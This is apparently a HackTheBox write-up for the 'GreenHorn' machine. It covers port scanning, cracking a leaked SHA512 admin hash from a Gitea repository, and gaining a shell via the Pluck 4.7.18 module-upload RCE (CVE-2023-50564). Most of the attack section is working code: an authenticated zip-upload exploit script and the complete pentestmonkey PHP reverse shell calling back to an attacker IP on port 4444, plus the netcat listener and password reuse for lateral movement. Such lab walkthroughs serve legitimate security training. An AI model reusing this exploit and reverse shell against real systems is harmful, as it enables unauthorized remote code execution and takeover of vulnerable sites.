GreenHorn

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 10.10.11.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-30 21:26 EDT
Warning: 10.10.11.25 giving up on port because retransmission cap hit (10).
Nmap scan report for greenhorn.htb (10.10.11.25)
Host is up (0.062s latency).
Not shown: 48457 closed tcp ports (conn-refused), 17075 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=028cb0905d6d682f; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=1SLv8xFN-ge9AGaLlQ7RryF0RLw6MTcyMjM4ODY4OTAyNjMxMTUwNA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 31 Jul 2024 01:18:09 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=00121af976dae168; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=kzDLEtOxCdEEC4xdaA13UzC_WQk6MTcyMjM4ODY5NDM3MjkzNTEwMw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 31 Jul 2024 01:18:14 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=7/30%Time=66A992E5%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_git
SF:ea=028cb0905d6d682f;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Coo
SF:kie:\x20_csrf=1SLv8xFN-ge9AGaLlQ7RryF0RLw6MTcyMjM4ODY4OTAyNjMxMTUwNA;\x
SF:20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2031\x20Jul\x202024\x2001:18:09\x
SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"the
SF:me-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<title>GreenHorn</title>\n\t<link\x
SF:20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjoiR
SF:3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6
SF:Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmh
SF:vcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLC
SF:JzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvY
SF:X")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(HTTPOptions,1A4,"HTTP/1\.0\x20405\x20Method\x20Not\x20All
SF:owed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Cont
SF:rol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nS
SF:et-Cookie:\x20i_like_gitea=00121af976dae168;\x20Path=/;\x20HttpOnly;\x2
SF:0SameSite=Lax\r\nSet-Cookie:\x20_csrf=kzDLEtOxCdEEC4xdaA13UzC_WQk6MTcyM
SF:jM4ODY5NDM3MjkzNTEwMw;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20Sam
SF:eSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2031\x20J
SF:ul\x202024\x2001:18:14\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPR
SF:equest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.61 seconds

Initial Access

Port 3000

First, we will add the IP address to the host file.

$ echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.11.25 greenhorn.htb

We are brought to this page after visiting it.

When we click on register or sign in page, we are able to see the version of Gitea that is running.

However, this version of gitea does not give us much information. Next, we click on the Explore tab on the top left corner and we are greeted with this.

When we click into this repo, it brings us to this page.

After some enumerating, we can see that the in ./docs/update.php it contains location of the password file that is being stored.

After going to that location, we can see that is indeed a hash contain in the file.

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

We will check online if this hash is indeed a SHA512 hash and it is indeed a SHA512 hash.

Hash AnalyzerTunnelsUP

Then we will try to crack the hash.

SHA512 Hash Cracking | passwordrecovery.iopasswordrecovery.io

The password turns out to be iloveyou1.

However, there is nothing really much that can be digged up from this port.

Port 80

So with that password in mind, we will visit port 80 to see if there is anything running on it.

From what we gathered from port 3000, it seems that the application in the repo on port 3000 is running on port 80.

If we try to click on admin at the bottom of the page, we can see a login page and the version of pluck.

We can see that this version of pluck has an RCE linked to it.

Pluck v4.7.18 - Remote Code Execution (RCE)Exploit Database

However, it requires a password. It turns out the password that we got just now is the correct password. Now, it will redirect us to this page.

Since now we have the password, we will just follow the steps on this repo and see if the exploits works.

GitHub - Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC: A Proof of Concept for CVE-2023-50564 vulnerability in Pluck CMS version 4.7.18GitHub

First, we need to install requests_toolbelt.

$ pip install requests requests_toolbelt

Next, we will clone the repo to our kali machine and cd into it.

$ git clone https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC.git
cd CVE-2023-50564_Pluck-v4.7.18_PoC
Cloning into 'CVE-2023-50564_Pluck-v4.7.18_PoC'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 26 (delta 4), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (26/26), 15.46 KiB | 2.21 MiB/s, done.
Resolving deltas: 100% (4/4), done.
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/hackthebox/boxes/GreenHorn/CVE-2023-50564_Pluck-v4.7.18_PoC]
└─$

After which, we will modify poc.py. This is the modified version of poc.py

#Replace <hostname>
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://greenhorn.htb/login.php"
upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "iloveyou1","junior": "","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("payload.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url="http://greenhorn.htb/data/modules/payload/shell.php"

rce=requests.get(rce_url)

print(rce.text)

Next, we will create shell.php. This is the content:

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.65';
$port = 4444;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Next, we will then zip the webshell up and name it payload.zip

┌──(kali㉿kali)-[~/…/hackthebox/boxes/GreenHorn/CVE-2023-50564_Pluck-v4.7.18_PoC]
└─$ zip payload.zip shell.php
  adding: shell.php (deflated 60%)
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/hackthebox/boxes/GreenHorn/CVE-2023-50564_Pluck-v4.7.18_PoC]
└─$ ls    
payload.zip  poc.py  README.md  shell.php  shell.rar

Next, we will run the listener.

$ nc -nlvp 4444                                             
listening on [any] 4444 ...

Finally, we will run the exploit which will return us a reverse shell as www-data.

Lateral Movement

Upgrading Shell

We will use the method from Upgrading Shells

Reusing the same password

We can try to change user to junior using the password that we got just now and it turns out it works.

After which we are able to get user.txt

PreviousKeeper NextPermX

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagPort 3000

hashtagPort 80

hashtagLateral Movement

hashtagUpgrading Shell

hashtagReusing the same password